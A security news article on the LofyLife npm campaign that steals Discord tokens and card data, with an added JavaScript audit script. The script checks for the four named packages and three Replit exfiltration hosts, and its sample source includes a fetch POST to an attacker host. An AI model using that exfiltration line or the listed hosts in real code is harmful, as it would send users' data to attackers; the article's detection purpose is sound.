Multiple npm packages are being used in an ongoing malicious campaign dubbed LofyLife to infect Discord users with malware that steals their Discord tokens and payment card information.
The malware used in these attacks is a variant of the open-source and Python-based Volt Stealer token logger, according to Kaspersky security researchers Igor Kuznetsov and Leonid Bezvershenko.
“On July 26, using the internal automated system for monitoring open-source repositories, we identified four suspicious packages in the Node Package Manager (npm) repository,” the researchers said.
“All these packages contained highly obfuscated malicious Python and JavaScript code. We dubbed this malicious campaign ‘LofyLife’.”
The malware is deployed automatically as soon as any of the four malicious npm modules (small-sm, pern-valids, lifeculer, or proc-title) is installed.
Once installed, it collects Discord tokens and system information, including the victims’ IP addresses.
Monitors Discord users to steal their data
It monitors the victim's Discord activity, including logins, attempts to change credentials, multi-factor authentication (MFA) toggles, and the addition of new payment methods, so that it can capture both the Discord account and the complete payment details.
Once harvested, this data is uploaded to one of several Replit-hosted instances whose addresses are hard-coded within the malware (e.g., life.polarlabs.repl[.]co, sock.polarlabs.repl[.]co, idk.polarlabs.repl[.]co).
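The indicators the write-up gives (four package names and three hard-coded Replit hosts) are enough for a first-pass audit of a Node.js project. The script below is an added example, not code from Kaspersky or from the campaign itself: it walks the `packages` map of a package-lock.json (lockfile v2/v3 layout) looking for the named modules, and scans a file's text for the exfiltration hosts in plain, base64 and `\xHH` hex-escaped form. The sample lockfile and source snippet are constructed for the demo, and the idea that an obfuscator would encode each host as its own string literal is an assumption made here, not something the researchers state.

```javascript
'use strict';
// Added example: audit an npm dependency tree and a source file against the
// LofyLife indicators quoted in the article. Package names and hostnames are
// the ones from the write-up; the lockfile and source text are constructed.

// The four npm packages Kaspersky identified on July 26.
const LOFYLIFE_PACKAGES = new Set(['small-sm', 'pern-valids', 'lifeculer', 'proc-title']);

// Hard-coded exfiltration hosts from the article, with the defanging brackets removed.
const LOFYLIFE_HOSTS = [
  'life.polarlabs.repl.co',
  'sock.polarlabs.repl.co',
  'idk.polarlabs.repl.co',
];

// Walk a lockfile "packages" map whose keys look like "node_modules/foo" or
// "node_modules/foo/node_modules/bar" and return the paths of any known-bad package.
function findLofyLifePackages(lockfile) {
  const hits = [];
  for (const pathKey of Object.keys(lockfile.packages || {})) {
    if (pathKey === '') continue;                        // root project entry
    const name = pathKey.split('node_modules/').pop();  // last segment is the package name
    if (LOFYLIFE_PACKAGES.has(name)) hits.push(pathKey);
  }
  return hits;
}

// Forms a host string might take in obfuscated code: plaintext, base64 of the
// whole host, and JS "\xHH" escapes. Assumption: the host is encoded as its own
// literal; base64 of a larger blob that merely contains the host will not match.
function encodedForms(host) {
  const hex = [...host]
    .map((c) => '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0'))
    .join('');
  return { plain: host, base64: Buffer.from(host, 'utf8').toString('base64'), hex };
}

// Return every (host, encoding) pair found in the given source text.
function findLofyLifeHosts(sourceText) {
  const found = [];
  for (const host of LOFYLIFE_HOSTS) {
    for (const [form, needle] of Object.entries(encodedForms(host))) {
      if (sourceText.includes(needle)) found.push({ host, form });
    }
  }
  return found;
}

function auditProject(lockfile, sourceText) {
  return { packages: findLofyLifePackages(lockfile), hosts: findLofyLifeHosts(sourceText) };
}

// Constructed sample lockfile: one bad package as a direct dependency, one nested.
const SAMPLE_LOCKFILE = {
  name: 'demo-bot',
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-bot', dependencies: { 'discord.js': '^14.0.0', 'proc-title': '^1.0.0' } },
    'node_modules/discord.js': { version: '14.11.0' },
    'node_modules/proc-title': { version: '1.0.3' },
    'node_modules/discord.js/node_modules/lifeculer': { version: '0.0.2' },
  },
};

// Constructed sample source: one host base64-encoded, one in the clear.
const SAMPLE_SOURCE =
  'const a=atob("' + Buffer.from('sock.polarlabs.repl.co').toString('base64') + '");' +
  'fetch("https://life.polarlabs.repl.co/log",{method:"POST"})';

console.log(JSON.stringify(auditProject(SAMPLE_LOCKFILE, SAMPLE_SOURCE), null, 2));
```

A clean result proves little: the same operators can publish the stealer under new package names, and heavily obfuscated code may build the host name at runtime rather than storing it as one literal. Treat this as a quick triage step alongside a registry-side check for newly published packages.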
Kaspersky added that it is still monitoring updates to the npm repository so that any new malicious packages pushing this info stealer are detected and removed.
Targeting Discord users is a recurring theme among malicious npm packages, and LofyLife is just the latest in a seemingly endless stream of information stealers tailored to Discord in recent years.
For instance, in 2019, malware dubbed Spidey Bot was used to modify the Windows Discord client to backdoor it and deploy an information-stealing trojan.
Malicious npm and PyPI libraries have also been used to target Discord users, stealing their user tokens and browser information and installing MBRLocker data-wiping malware that calls itself Monster Ransomware.